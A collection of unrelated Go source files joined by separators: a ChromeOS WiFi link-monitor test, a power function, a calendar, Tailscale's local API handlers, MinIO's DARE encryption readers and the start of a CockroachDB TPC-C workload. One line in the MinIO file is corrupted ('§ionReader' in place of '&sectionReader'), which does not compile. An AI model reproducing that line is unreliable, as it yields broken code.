"chromiumos/tast/services/cros/wifi"
"chromiumos/tast/testing"
)
func init() {
testing.AddTest(&testing.Test{
Func: LinkMonitorFailure,
Desc: "Verifies how fast the DUT detects the link failure and reconnects to the AP when an AP changes its DHCP configuration",
Contacts: []string{
"chromeos-wifi-champs@google.com", // WiFi oncall rotation; or http://b/new?component=893827
},
Attr: []string{"group:wificell", "wificell_func"},
ServiceDeps: []string{wificell.TFServiceName},
Fixture: "wificellFixt",
})
}
func LinkMonitorFailure(ctx context.Context, s *testing.State) {
const (
// Passive link monitor takes up to 25 seconds to fail; active link monitor takes up to 50 seconds to fail.
linkFailureDetectedTimeout = 80 * time.Second
reassociateTimeout = 10 * time.Second
)
tf := s.FixtValue().(*wificell.TestFixture)
ap, err := tf.DefaultOpenNetworkAP(ctx)
if err != nil {
s.Fatal("Failed to configure the AP: ", err)
}
defer func(ctx context.Context) {
if err := tf.DeconfigAP(ctx, ap); err != nil {
s.Error("Failed to deconfig the AP: ", err)
}
}(ctx)
ctx, cancel := tf.ReserveForDeconfigAP(ctx, ap)
defer cancel()
s.Log("Test fixture setup done; connecting the DUT to the AP")
if _, err := tf.ConnectWifiAP(ctx, ap); err != nil {
s.Fatal("Failed to connect to WiFi: ", err)
}
defer func(ctx context.Context) {
if err := tf.DisconnectWifi(ctx); err != nil {
s.Error("Failed to disconnect WiFi: ", err)
}
req := &wifi.DeleteEntriesForSSIDRequest{Ssid: []byte(ap.Config().SSID)}
if _, err := tf.WifiClient().DeleteEntriesForSSID(ctx, req); err != nil {
s.Errorf("Failed to remove entries for ssid=%s: %v", ap.Config().SSID, err)
}
}(ctx)
ctx, cancel = ctxutil.Shorten(ctx, 5*time.Second)
defer cancel()
s.Log("WiFi connected; starting the test")
if err := tf.PingFromDUT(ctx, ap.ServerIP().String()); err != nil {
s.Fatal("Failed to ping from the DUT: ", err)
}
ew, err := iw.NewEventWatcher(ctx, s.DUT())
if err != nil {
s.Fatal("Failed to create iw event watcher: ", err)
}
defer ew.Stop()
// Start to change the DHCP config.
// Obtain current time from the DUT because we use the "disconnect" event timestamp as
// the end time of the link failure detection duration, which is from the DUT's clock.
linkFailureTime, err := tf.WifiClient().CurrentTime(ctx)
if err != nil {
s.Fatal("Failed to get the current DUT time: ", err)
}
if err := ap.ChangeSubnetIdx(ctx); err != nil {
s.Fatal("Failed to change the subnet index of the AP: ", err)
}
s.Log("Waiting for link failure detected event")
wCtx, cancel := context.WithTimeout(ctx, linkFailureDetectedTimeout)
defer cancel()
linkFailureDetectedEv, err := ew.WaitByType(wCtx, iw.EventTypeDisconnect)
if err != nil {
s.Fatal("Failed to wait for link failure detected event: ", err)
}
// Calculate duration for sensing the link failure.
linkFailureDetectedDuration := linkFailureDetectedEv.Timestamp.Sub(linkFailureTime)
if linkFailureDetectedDuration > linkFailureDetectedTimeout {
s.Error("Failed to detect link failure within given timeout")
}
s.Logf("Link failure detection time: %.2f seconds", linkFailureDetectedDuration.Seconds())
s.Log("Waiting for reassociation to complete")
wCtx, cancel = context.WithTimeout(ctx, reassociateTimeout)
defer cancel()
connectedEv, err := ew.WaitByType(wCtx, iw.EventTypeConnected)
if err != nil {
s.Error("Failed to wait for reassociation to complete: ", err)
}
// Get the reassociation time.
reassociateDuration := connectedEv.Timestamp.Sub(linkFailureDetectedEv.Timestamp)
if reassociateDuration < 0 {
s.Errorf("Unexpected reassociate duration: %d is negative", reassociateDuration)
}
if reassociateDuration > reassociateTimeout {
s.Error("Failed to reassociate within given timeout")
}
s.Logf("Reassociate time: %.2f seconds", reassociateDuration.Seconds())
}
|
package main
import "fmt"
func main() {
x := 2.00000
n := 10
fmt.Println(myPow(x, n))
}
func myPow(x float64, n int) float64 {
if n < 0 {
n = -n
x = 1 / x
}
return pow(x, n)
}
func pow(x float64, n int) float64 {
if n == 0 {
return 1.0
}
half := pow(x, n/2)
if n%2 == 1 {
return half * half * x
}
return half * half
}
|
package calendar
import (
"encoding/json"
"fmt"
"io/ioutil"
"math"
"strings"
)
type Calendar struct {
CurrentDay int
CurrentSeason *Season
Seasons []*Season `json:"seasons"`
}
func NewCalendar(pathToCalendar string, day int, seasonName string) (*Calendar, error) {
calendar, err := loadCalendar(pathToCalendar)
if err != nil {
return nil, err
}
season, err := getSeasonByName(calendar.Seasons, seasonName)
if err != nil {
return nil, err
}
calendar.CurrentDay = day
calendar.CurrentSeason = season
return calendar, nil
}
func (c *Calendar) NextDay() error {
if c.CurrentDay == 28 {
c.CurrentDay = 1
nextSeason, err := getNextSeason(c.CurrentSeason, c.Seasons)
if err != nil {
return err
}
c.CurrentSeason = nextSeason
} else {
c.CurrentDay++
}
return nil
}
func (c *Calendar) PreviousDay() error {
if c.CurrentDay == 1 {
c.CurrentDay = 28
previousSeason, err := getPreviousSeason(c.CurrentSeason, c.Seasons)
if err != nil {
return err
}
c.CurrentSeason = previousSeason
} else {
c.CurrentDay--
}
return nil
}
func (c *Calendar) CurrentEvents() ([]Event, error) {
return c.CurrentSeason.GetEvents(c.CurrentDay)
}
func (c *Calendar) EventsSummary(events []Event) []string {
lines := []string{}
totalEvents := len(events)
if totalEvents < 1 {
lines = append(lines, "No events today")
} else {
plural := "s"
if totalEvents == 1 {
plural = ""
}
lines = append(lines, fmt.Sprintf("%d event%s today:", totalEvents, plural))
lines = append(lines, " ")
for _, event := range events {
lines = append(lines, fmt.Sprintf("- %s", event))
lines = append(lines, " ")
}
}
return lines
}
func (c *Calendar) SeasonEmoji() string {
return c.CurrentSeason.Emoji()
}
func (c *Calendar) DaySheet(lines ...string) string {
width := 40
height := 20
var sb strings.Builder
dateStr := fmt.Sprintf("%s %s %d", c.SeasonEmoji(), c.CurrentSeason, c.CurrentDay)
dateStrRunes := []rune(dateStr)
leftPadding := 3
topPadding := 2
dateLineRow := topPadding
borderRow := dateLineRow + 2
totalLines := len(lines)
numerator := float64((height - borderRow) - (totalLines - 1))
denominator := float64(2)
contentStartRow := int(math.Round(numerator / denominator))
lineIndex := 0
accountForEmojiWidth := c.CurrentSeason.Name != "winter"
var lineRunes []rune
for row := 0; row < height; row++ {
topOrBottomRow := row == 0 || row == height-1
wroteLine := false
if lineIndex < totalLines {
lineRunes = []rune(lines[lineIndex])
} else {
lineRunes = nil
}
for column := 0; column < width; column++ {
firstColumn := column == 0
lastColumn := column == width-1
firstOrLastColumn := firstColumn || lastColumn
if topOrBottomRow && firstOrLastColumn {
sb.WriteString("#")
} else {
if topOrBottomRow {
sb.WriteString("-")
}
if firstOrLastColumn {
sb.WriteString("|")
}
}
contentIndex := column - leftPadding
if row == dateLineRow && contentIndex >= 0 && contentIndex < len(dateStrRunes) {
sb.WriteString(string(dateStrRunes[contentIndex]))
} else if row >= contentStartRow && contentIndex >= 0 && lineRunes != nil && contentIndex < len(lineRunes) {
sb.WriteString(string(lineRunes[contentIndex]))
wroteLine = true
} else if row == borderRow && column > 0 && column < width-1 {
sb.WriteString("-")
} else if !topOrBottomRow && !firstOrLastColumn && (!accountForEmojiWidth || row != dateLineRow || contentIndex > len(dateStrRunes) || contentIndex < 0) {
sb.WriteString(" ")
}
if lastColumn {
if wroteLine {
lineIndex++
wroteLine = false
}
sb.WriteString("\n")
}
}
}
return sb.String()
}
func (c *Calendar) String() string {
return fmt.Sprintf("%s day %d", c.CurrentSeason, c.CurrentDay)
}
func loadCalendar(pathToCalendar string) (*Calendar, error) {
bytes, err := ioutil.ReadFile(pathToCalendar)
if err != nil {
return nil, err
}
var calendar Calendar
json.Unmarshal(bytes, &calendar)
return &calendar, nil
}
func getNextSeason(season *Season, seasons []*Season) (*Season, error) {
var lookingFor string
if season.Name == "spring" {
lookingFor = "summer"
} else if season.Name == "summer" {
lookingFor = "fall"
} else if season.Name == "fall" {
lookingFor = "winter"
} else if season.Name == "winter" {
lookingFor = "spring"
} else {
return nil, fmt.Errorf("Don't know next season after '%s'", season.Name)
}
for _, s := range seasons {
if s.Name == lookingFor {
return s, nil
}
}
return nil, fmt.Errorf("Could not find season '%s'", lookingFor)
}
func getPreviousSeason(season *Season, seasons []*Season) (*Season, error) {
var lookingFor string
if season.Name == "spring" {
lookingFor = "winter"
} else if season.Name == "summer" {
lookingFor = "spring"
} else if season.Name == "fall" {
lookingFor = "summer"
} else if season.Name == "winter" {
lookingFor = "fall"
} else {
return nil, fmt.Errorf("Don't know next season before '%s'", season.Name)
}
for _, s := range seasons {
if s.Name == lookingFor {
return s, nil
}
}
return nil, fmt.Errorf("Could not find season '%s'", lookingFor)
}
|
package models
type Media struct {
LogoImagePath string `json:"logo_image_path"`
ChannelBannerImagePath string `json:"channel_banner_image_path"`
}
type ChannelModel struct {
ChannelID int `json:"channel_id"`
ChannelName string `json:"channel_name"`
ChannelRank int `json:"channel_rank"`
ChannelSubscribersCount int `json:"channel_subscribers_count"`
ChannelViewsCount int `json:"channel_views_count"`
ChannelVideosCount int `json:"channel_videos_count"`
Media Media `json:"media"`
}
type ChannelsModel struct {
Channels []ChannelModel `json:"channels"`
}
|
// Copyright (c) 2021 Tailscale Inc & AUTHORS All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
// Package localapi contains the HTTP server handlers for tailscaled's API server.
package localapi
import (
"crypto/rand"
"encoding/hex"
"encoding/json"
"errors"
"fmt"
"io"
"net"
"net/http"
"net/http/httputil"
"net/url"
"reflect"
"runtime"
"strconv"
"strings"
"sync"
"time"
"inet.af/netaddr"
"tailscale.com/client/tailscale/apitype"
"tailscale.com/ipn"
"tailscale.com/ipn/ipnlocal"
"tailscale.com/ipn/ipnstate"
"tailscale.com/net/netknob"
"tailscale.com/tailcfg"
"tailscale.com/types/logger"
"tailscale.com/version"
)
func randHex(n int) string {
b := make([]byte, n)
rand.Read(b)
return hex.EncodeToString(b)
}
func NewHandler(b *ipnlocal.LocalBackend, logf logger.Logf, logID string) *Handler {
return &Handler{b: b, logf: logf, backendLogID: logID}
}
type Handler struct {
// RequiredPassword, if non-empty, forces all HTTP
// requests to have HTTP basic auth with this password.
// It's used by the sandboxed macOS sameuserproof GUI auth mechanism.
RequiredPassword string
// PermitRead is whether read-only HTTP handlers are allowed.
PermitRead bool
// PermitWrite is whether mutating HTTP handlers are allowed.
PermitWrite bool
b *ipnlocal.LocalBackend
logf logger.Logf
backendLogID string
}
func (h *Handler) ServeHTTP(w http.ResponseWriter, r *http.Request) {
if h.b == nil {
http.Error(w, "server has no local backend", http.StatusInternalServerError)
return
}
w.Header().Set("Tailscale-Version", version.Long)
if h.RequiredPassword != "" {
_, pass, ok := r.BasicAuth()
if !ok {
http.Error(w, "auth required", http.StatusUnauthorized)
return
}
if pass != h.RequiredPassword {
http.Error(w, "bad password", http.StatusForbidden)
return
}
}
if strings.HasPrefix(r.URL.Path, "/localapi/v0/files/") {
h.serveFiles(w, r)
return
}
if strings.HasPrefix(r.URL.Path, "/localapi/v0/file-put/") {
h.serveFilePut(w, r)
return
}
if strings.HasPrefix(r.URL.Path, "/localapi/v0/cert/") {
h.serveCert(w, r)
return
}
switch r.URL.Path {
case "/localapi/v0/whois":
h.serveWhoIs(w, r)
case "/localapi/v0/goroutines":
h.serveGoroutines(w, r)
case "/localapi/v0/profile":
h.serveProfile(w, r)
case "/localapi/v0/status":
h.serveStatus(w, r)
case "/localapi/v0/logout":
h.serveLogout(w, r)
case "/localapi/v0/prefs":
h.servePrefs(w, r)
case "/localapi/v0/check-ip-forwarding":
h.serveCheckIPForwarding(w, r)
case "/localapi/v0/bugreport":
h.serveBugReport(w, r)
case "/localapi/v0/file-targets":
h.serveFileTargets(w, r)
case "/localapi/v0/set-dns":
h.serveSetDNS(w, r)
case "/localapi/v0/derpmap":
h.serveDERPMap(w, r)
case "/":
io.WriteString(w, "tailscaled\n")
default:
http.Error(w, "404 not found", 404)
}
}
func (h *Handler) serveBugReport(w http.ResponseWriter, r *http.Request) {
if !h.PermitRead {
http.Error(w, "bugreport access denied", http.StatusForbidden)
return
}
logMarker := fmt.Sprintf("BUG-%v-%v-%v", h.backendLogID, time.Now().UTC().Format("20060102150405Z"), randHex(8))
h.logf("user bugreport: %s", logMarker)
if note := r.FormValue("note"); len(note) > 0 {
h.logf("user bugreport note: %s", note)
}
w.Header().Set("Content-Type", "text/plain")
fmt.Fprintln(w, logMarker)
}
func (h *Handler) serveWhoIs(w http.ResponseWriter, r *http.Request) {
if !h.PermitRead {
http.Error(w, "whois access denied", http.StatusForbidden)
return
}
b := h.b
var ipp netaddr.IPPort
if v := r.FormValue("addr"); v != "" {
var err error
ipp, err = netaddr.ParseIPPort(v)
if err != nil {
http.Error(w, "invalid 'addr' parameter", 400)
return
}
} else {
http.Error(w, "missing 'addr' parameter", 400)
return
}
n, u, ok := b.WhoIs(ipp)
if !ok {
http.Error(w, "no match for IP:port", 404)
return
}
res := &apitype.WhoIsResponse{
Node: n,
UserProfile: &u,
}
j, err := json.MarshalIndent(res, "", "\t")
if err != nil {
http.Error(w, "JSON encoding error", 500)
return
}
w.Header().Set("Content-Type", "application/json")
w.Write(j)
}
func (h *Handler) serveGoroutines(w http.ResponseWriter, r *http.Request) {
// Require write access out of paranoia that the goroutine dump
// (at least its arguments) might contain something sensitive.
if !h.PermitWrite {
http.Error(w, "goroutine dump access denied", http.StatusForbidden)
return
}
buf := make([]byte, 2<<20)
buf = buf[:runtime.Stack(buf, true)]
w.Header().Set("Content-Type", "text/plain")
w.Write(buf)
}
// serveProfileFunc is the implementation of Handler.serveProfile, after auth,
// for platforms where we want to link it in.
var serveProfileFunc func(http.ResponseWriter, *http.Request)
func (h *Handler) serveProfile(w http.ResponseWriter, r *http.Request) {
// Require write access out of paranoia that the profile dump
// might contain something sensitive.
if !h.PermitWrite {
http.Error(w, "profile access denied", http.StatusForbidden)
return
}
if serveProfileFunc == nil {
http.Error(w, "not implemented on this platform", http.StatusServiceUnavailable)
return
}
serveProfileFunc(w, r)
}
func (h *Handler) serveCheckIPForwarding(w http.ResponseWriter, r *http.Request) {
if !h.PermitRead {
http.Error(w, "IP forwarding check access denied", http.StatusForbidden)
return
}
var warning string
if err := h.b.CheckIPForwarding(); err != nil {
warning = err.Error()
}
w.Header().Set("Content-Type", "application/json")
json.NewEncoder(w).Encode(struct {
Warning string
}{
Warning: warning,
})
}
func (h *Handler) serveStatus(w http.ResponseWriter, r *http.Request) {
if !h.PermitRead {
http.Error(w, "status access denied", http.StatusForbidden)
return
}
w.Header().Set("Content-Type", "application/json")
var st *ipnstate.Status
if defBool(r.FormValue("peers"), true) {
st = h.b.Status()
} else {
st = h.b.StatusWithoutPeers()
}
e := json.NewEncoder(w)
e.SetIndent("", "\t")
e.Encode(st)
}
func (h *Handler) serveLogout(w http.ResponseWriter, r *http.Request) {
if !h.PermitWrite {
http.Error(w, "logout access denied", http.StatusForbidden)
return
}
if r.Method != "POST" {
http.Error(w, "want POST", 400)
return
}
err := h.b.LogoutSync(r.Context())
if err == nil {
w.WriteHeader(http.StatusNoContent)
return
}
http.Error(w, err.Error(), 500)
}
func (h *Handler) servePrefs(w http.ResponseWriter, r *http.Request) {
if !h.PermitRead {
http.Error(w, "prefs access denied", http.StatusForbidden)
return
}
var prefs *ipn.Prefs
switch r.Method {
case "PATCH":
if !h.PermitWrite {
http.Error(w, "prefs write access denied", http.StatusForbidden)
return
}
mp := new(ipn.MaskedPrefs)
if err := json.NewDecoder(r.Body).Decode(mp); err != nil {
http.Error(w, err.Error(), 400)
return
}
var err error
prefs, err = h.b.EditPrefs(mp)
if err != nil {
http.Error(w, err.Error(), 400)
return
}
case "GET", "HEAD":
prefs = h.b.Prefs()
default:
http.Error(w, "unsupported method", http.StatusMethodNotAllowed)
return
}
w.Header().Set("Content-Type", "application/json")
e := json.NewEncoder(w)
e.SetIndent("", "\t")
e.Encode(prefs)
}
func (h *Handler) serveFiles(w http.ResponseWriter, r *http.Request) {
if !h.PermitWrite {
http.Error(w, "file access denied", http.StatusForbidden)
return
}
suffix := strings.TrimPrefix(r.URL.EscapedPath(), "/localapi/v0/files/")
if suffix == "" {
if r.Method != "GET" {
http.Error(w, "want GET to list files", 400)
return
}
wfs, err := h.b.WaitingFiles()
if err != nil {
http.Error(w, err.Error(), 500)
return
}
w.Header().Set("Content-Type", "application/json")
json.NewEncoder(w).Encode(wfs)
return
}
name, err := url.PathUnescape(suffix)
if err != nil {
http.Error(w, "bad filename", 400)
return
}
if r.Method == "DELETE" {
if err := h.b.DeleteFile(name); err != nil {
http.Error(w, err.Error(), 500)
return
}
w.WriteHeader(http.StatusNoContent)
return
}
rc, size, err := h.b.OpenFile(name)
if err != nil {
http.Error(w, err.Error(), 500)
return
}
defer rc.Close()
w.Header().Set("Content-Length", fmt.Sprint(size))
io.Copy(w, rc)
}
func writeErrorJSON(w http.ResponseWriter, err error) {
if err == nil {
err = errors.New("unexpected nil error")
}
w.Header().Set("Content-Type", "application/json")
w.WriteHeader(500)
type E struct {
Error string `json:"error"`
}
json.NewEncoder(w).Encode(E{err.Error()})
}
func (h *Handler) serveFileTargets(w http.ResponseWriter, r *http.Request) {
if !h.PermitRead {
http.Error(w, "access denied", http.StatusForbidden)
return
}
if r.Method != "GET" {
http.Error(w, "want GET to list targets", 400)
return
}
fts, err := h.b.FileTargets()
if err != nil {
writeErrorJSON(w, err)
return
}
makeNonNil(&fts)
w.Header().Set("Content-Type", "application/json")
json.NewEncoder(w).Encode(fts)
}
func (h *Handler) serveFilePut(w http.ResponseWriter, r *http.Request) {
if !h.PermitWrite {
http.Error(w, "file access denied", http.StatusForbidden)
return
}
if r.Method != "PUT" {
http.Error(w, "want PUT to put file", 400)
return
}
fts, err := h.b.FileTargets()
if err != nil {
http.Error(w, err.Error(), 500)
return
}
upath := strings.TrimPrefix(r.URL.EscapedPath(), "/localapi/v0/file-put/")
slash := strings.Index(upath, "/")
if slash == -1 {
http.Error(w, "bogus URL", 400)
return
}
stableID, filenameEscaped := tailcfg.StableNodeID(upath[:slash]), upath[slash+1:]
var ft *apitype.FileTarget
for _, x := range fts {
if x.Node.StableID == stableID {
ft = x
break
}
}
if ft == nil {
http.Error(w, "node not found", 404)
return
}
dstURL, err := url.Parse(ft.PeerAPIURL)
if err != nil {
http.Error(w, "bogus peer URL", 500)
return
}
outReq, err := http.NewRequestWithContext(r.Context(), "PUT", "http://peer/v0/put/"+filenameEscaped, r.Body)
if err != nil {
http.Error(w, "bogus outreq", 500)
return
}
outReq.ContentLength = r.ContentLength
rp := httputil.NewSingleHostReverseProxy(dstURL)
rp.Transport = getDialPeerTransport(h.b)
rp.ServeHTTP(w, outReq)
}
func (h *Handler) serveSetDNS(w http.ResponseWriter, r *http.Request) {
if !h.PermitWrite {
http.Error(w, "access denied", http.StatusForbidden)
return
}
if r.Method != "POST" {
http.Error(w, "want POST", 400)
return
}
ctx := r.Context()
err := h.b.SetDNS(ctx, r.FormValue("name"), r.FormValue("value"))
if err != nil {
writeErrorJSON(w, err)
return
}
w.Header().Set("Content-Type", "application/json")
json.NewEncoder(w).Encode(struct{}{})
}
func (h *Handler) serveDERPMap(w http.ResponseWriter, r *http.Request) {
if r.Method != "GET" {
http.Error(w, "want GET", 400)
return
}
w.Header().Set("Content-Type", "application/json")
e := json.NewEncoder(w)
e.SetIndent("", "\t")
e.Encode(h.b.DERPMap())
}
var dialPeerTransportOnce struct {
sync.Once
v *http.Transport
}
func getDialPeerTransport(b *ipnlocal.LocalBackend) *http.Transport {
dialPeerTransportOnce.Do(func() {
t := http.DefaultTransport.(*http.Transport).Clone()
t.Dial = nil
dialer := net.Dialer{
Timeout: 30 * time.Second,
KeepAlive: netknob.PlatformTCPKeepAlive(),
Control: b.PeerDialControlFunc(),
}
t.DialContext = dialer.DialContext
dialPeerTransportOnce.v = t
})
return dialPeerTransportOnce.v
}
func defBool(a string, def bool) bool {
if a == "" {
return def
}
v, err := strconv.ParseBool(a)
if err != nil {
return def
}
return v
}
// makeNonNil takes a pointer to a Go data structure
// (currently only a slice or a map) and makes sure it's non-nil for
// JSON serialization. (In particular, JavaScript clients usually want
// the field to be defined after they decode the JSON.)
func makeNonNil(ptr interface{}) {
if ptr == nil {
panic("nil interface")
}
rv := reflect.ValueOf(ptr)
if rv.Kind() != reflect.Ptr {
panic(fmt.Sprintf("kind %v, not Ptr", rv.Kind()))
}
if rv.Pointer() == 0 {
panic("nil pointer")
}
rv = rv.Elem()
if rv.Pointer() != 0 {
return
}
switch rv.Type().Kind() {
case reflect.Slice:
rv.Set(reflect.MakeSlice(rv.Type(), 0, 0))
case reflect.Map:
rv.Set(reflect.MakeMap(rv.Type()))
}
}
|
// Copyright 2018 High Fidelity, Inc.
//
// Distributed under the Apache License, Version 2.0.
// See the accompanying file LICENSE or http://www.apache.org/licenses/LICENSE-2.0.html
package key
import "syscall"
func mlock(data []byte) error {
return syscall.Mlock(data)
}
|
package car
import "fmt"
type BMWModel struct {
CarModel
}
func (h BMWModel) Start() {
fmt.Println("BMW start")
}
func (h BMWModel) Stop() {
fmt.Println("BMW Stop")
}
func (h BMWModel) Alarm() {
fmt.Println("BMW Alarm")
}
|
// Copyright (C) 2017 Minio Inc.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package sio
import (
"errors"
"io"
)
type encReaderV10 struct {
authEncV10
src io.Reader
buffer packageV10
offset int
payloadSize int
stateErr error
}
// encryptReaderV10 returns an io.Reader wrapping the given io.Reader.
// The returned io.Reader encrypts everything it reads using DARE 1.0.
func encryptReaderV10(src io.Reader, config *Config) (*encReaderV10, error) {
ae, err := newAuthEncV10(config)
if err != nil {
return nil, err
}
return &encReaderV10{
authEncV10: ae,
src: src,
buffer: packageBufferPool.Get().([]byte)[:maxPackageSize],
payloadSize: config.PayloadSize,
}, nil
}
func (r *encReaderV10) recycle() {
recyclePackageBufferPool(r.buffer)
r.buffer = nil
}
func (r *encReaderV10) Read(p []byte) (int, error) {
if r.stateErr != nil {
return 0, r.stateErr
}
var n int
if r.offset > 0 { // write the buffered package to p
remaining := r.buffer.Length() - r.offset // remaining encrypted bytes
if len(p) < remaining {
n = copy(p, r.buffer[r.offset:r.offset+len(p)])
r.offset += n
return n, nil
}
n = copy(p, r.buffer[r.offset:r.offset+remaining])
p = p[remaining:]
r.offset = 0
}
for len(p) >= headerSize+r.payloadSize+tagSize {
nn, err := io.ReadFull(r.src, p[headerSize:headerSize+r.payloadSize]) // read plaintext from src
if err != nil && err != io.ErrUnexpectedEOF {
r.recycle()
r.stateErr = err
return n, err // return if reading from src fails or reached EOF
}
r.Seal(p, p[headerSize:headerSize+nn])
n += headerSize + nn + tagSize
p = p[headerSize+nn+tagSize:]
}
if len(p) > 0 {
nn, err := io.ReadFull(r.src, r.buffer[headerSize:headerSize+r.payloadSize]) // read plaintext from src
if err != nil && err != io.ErrUnexpectedEOF {
r.stateErr = err
r.recycle()
return n, err // return if reading from src fails or reached EOF
}
r.Seal(r.buffer, r.buffer[headerSize:headerSize+nn])
if length := r.buffer.Length(); length < len(p) {
r.offset = copy(p, r.buffer[:length])
} else {
r.offset = copy(p, r.buffer[:len(p)])
}
n += r.offset
}
return n, nil
}
type decReaderV10 struct {
authDecV10
src io.Reader
buffer packageV10
offset int
stateErr error
}
// decryptReaderV10 returns an io.Reader wrapping the given io.Reader.
// The returned io.Reader decrypts everything it reads using DARE 1.0.
func decryptReaderV10(src io.Reader, config *Config) (*decReaderV10, error) {
ad, err := newAuthDecV10(config)
if err != nil {
return nil, err
}
return &decReaderV10{
authDecV10: ad,
src: src,
buffer: packageBufferPool.Get().([]byte)[:maxPackageSize],
}, nil
}
func (r *decReaderV10) recycle() {
recyclePackageBufferPool(r.buffer)
r.buffer = nil
}
func (r *decReaderV10) Read(p []byte) (n int, err error) {
if r.stateErr != nil {
return 0, r.stateErr
}
if r.offset > 0 { // write the buffered plaintext to p
payload := r.buffer.Payload()
remaining := len(payload) - r.offset // remaining plaintext bytes
if len(p) < remaining {
n = copy(p, payload[r.offset:+r.offset+len(p)])
r.offset += n
return
}
n = copy(p, payload[r.offset:r.offset+remaining])
p = p[remaining:]
r.offset = 0
}
for len(p) >= maxPayloadSize {
if err = r.readPackage(r.buffer); err != nil {
r.stateErr = err
r.recycle()
return n, err
}
length := len(r.buffer.Payload())
if err = r.Open(p[:length], r.buffer[:r.buffer.Length()]); err != nil { // notice: buffer.Length() may be smaller than len(buffer)
r.stateErr = err
r.recycle()
return n, err // decryption failed
}
p = p[length:]
n += length
}
if len(p) > 0 {
if err = r.readPackage(r.buffer); err != nil {
r.stateErr = err
r.recycle()
return n, err
}
payload := r.buffer.Payload()
if err = r.Open(payload, r.buffer[:r.buffer.Length()]); err != nil { // notice: buffer.Length() may be smaller than len(buffer)
r.stateErr = err
r.recycle()
return n, err // decryption failed
}
if len(payload) < len(p) {
r.offset = copy(p, payload)
} else {
r.offset = copy(p, payload[:len(p)])
}
n += r.offset
}
return n, nil
}
func (r *decReaderV10) readPackage(dst packageV10) error {
header := dst.Header()
_, err := io.ReadFull(r.src, header)
if err == io.ErrUnexpectedEOF {
return errInvalidPayloadSize // partial header
}
if err != nil {
return err // reading from src failed or reached EOF
}
_, err = io.ReadFull(r.src, dst.Ciphertext())
if err == io.EOF || err == io.ErrUnexpectedEOF {
return errInvalidPayloadSize // reading less data than specified by header
}
if err != nil {
return err // reading from src failed or reached EOF
}
return nil
}
type decReaderAtV10 struct {
src io.ReaderAt
ad authDecV10
}
// decryptReaderAtV10 returns an io.ReaderAt wrapping the given io.ReaderAt.
// The returned io.ReaderAt decrypts everything it reads using DARE 1.0.
func decryptReaderAtV10(src io.ReaderAt, config *Config) (*decReaderAtV10, error) {
ad, err := newAuthDecV10(config)
if err != nil {
return nil, err
}
r := &decReaderAtV10{
ad: ad,
src: src,
}
return r, nil
}
func (r *decReaderAtV10) ReadAt(p []byte, offset int64) (n int, err error) {
if offset < 0 {
return 0, errors.New("sio: DecReaderAt.ReadAt: offset is negative")
}
t := offset / int64(maxPayloadSize)
if t+1 > (1<<32)-1 {
return 0, errUnexpectedSize
}
buffer := packageBufferPool.Get().([]byte)[:maxPackageSize]
defer recyclePackageBufferPool(buffer)
decReader := decReaderV10{
authDecV10: r.ad,
src: §ionReader{r.src, t * maxPackageSize},
buffer: packageV10(buffer),
offset: 0,
}
decReader.SeqNum = uint32(t)
if k := offset % int64(maxPayloadSize); k > 0 {
if _, err := io.CopyN(io.Discard, &decReader, k); err != nil {
return 0, err
}
}
for n < len(p) && err == nil {
var nn int
nn, err = (&decReader).Read(p[n:])
n += nn
}
if err == io.EOF && n == len(p) {
err = nil
}
return n, err
}
|
// Copyright 2017 The Cockroach Authors.
//
// Use of this software is governed by the Business Source License
// included in the file licenses/BSL.txt.
//
// As of the Change Date specified in that file, in accordance with
// the Business Source License, use of this software will be governed
// by the Apache License, Version 2.0, included in the file
// licenses/APL.txt.
package tpcc
import (
"context"
"sync/atomic"
"time"
"github.com/cockroachdb/cockroach-go/crdb"
"github.com/cockroachdb/cockroach/pkg/util/bufalloc"
"github.com/cockroachdb/cockroach/pkg/util/timeutil"
"github.com/cockroachdb/cockroach/pkg/workload"
"github.com/cockroachdb/errors"
"github.com/jackc/pgx/pgtype"
"golang.org/x/exp/rand"
)
// From the TPCC spec, section 2.6:
//
// The Order-Status business transaction queries the status of a customer's last
// order. It represents a mid-weight read-only database transaction with a low
// frequency of execution and response time requirement to satisfy on-line
// users. In addition, this table includes non-primary key access to the
// CUSTOMER table.
type orderStatusData struct {
// Return data specified by 2.6.3.3
dID int
cID int
cFirst string
cMiddle string
cLast string
cBalance float64
oID int
oEntryD time.Time
oCarrierID pgtype.Int8
items []orderItem
}
type customerData struct {
cID int
cBalance float64
cFirst string
cMiddle string
}
type orderStatus struct {
config *tpcc
mcp *workload.MultiConnPool
sr workload.SQLRunner
selectByCustID workload.StmtHandle
selectByLastName workload.StmtHandle
selectOrder workload.StmtHandle
selectItems workload.StmtHandle
a bufalloc.ByteAllocator
}
var _ tpccTx = &orderStatus{}
func createOrderStatus(
ctx context.Context, config *tpcc, mcp *workload.MultiConnPool,
) (tpccTx, error) {
o := &orderStatus{
config: config,
mcp: mcp,
}
// Select by customer id.
o.selectByCustID = o.sr.Define(`
SELECT c_balance, c_first, c_middle, c_last
FROM customer
WHERE c_w_id = $1 AND c_d_id = $2 AND c_id = $3`,
)
// Pick the middle row, rounded up, from the selection by last name.
o.selectByLastName = o.sr.Define(`
SELECT c_id, c_balance, c_first, c_middle
FROM customer
WHERE c_w_id = $1 AND c_d_id = $2 AND c_last = $3
ORDER BY c_first ASC`,
)
// Select the customer's order.
o.selectOrder = o.sr.Define(`
SELECT o_id, o_entry_d, o_carrier_id
FROM "order"
WHERE o_w_id = $1 AND o_d_id = $2 AND o_c_id = $3
ORDER BY o_id DESC
LIMIT 1`,
)
// Select the items from the customer's order.
o.selectItems = o.sr.Define(`
SELECT ol_i_id, ol_supply_w_id, ol_quantity, ol_amount, ol_delivery_d
FROM order_line
WHERE ol_w_id = $1 AND ol_d_id = $2 AND ol_o_id = $3`,
)
if err := o.sr.Init(ctx, "order-status", mcp, config.connFlags); err != nil {
return nil, err
}
return o, nil
}
func (o *orderStatus) run(ctx context.Context, wID int) (interface{}, error) {
atomic.AddUint64(&o.config.auditor.orderStatusTransactions, 1)
rng := rand.New(rand.NewSource(uint64(timeutil.Now().UnixNano())))
d := orderStatusData{
dID: rng.Intn(10) + 1,
}
// 2.6.1.2: The customer is randomly selected 60% of the time by last name
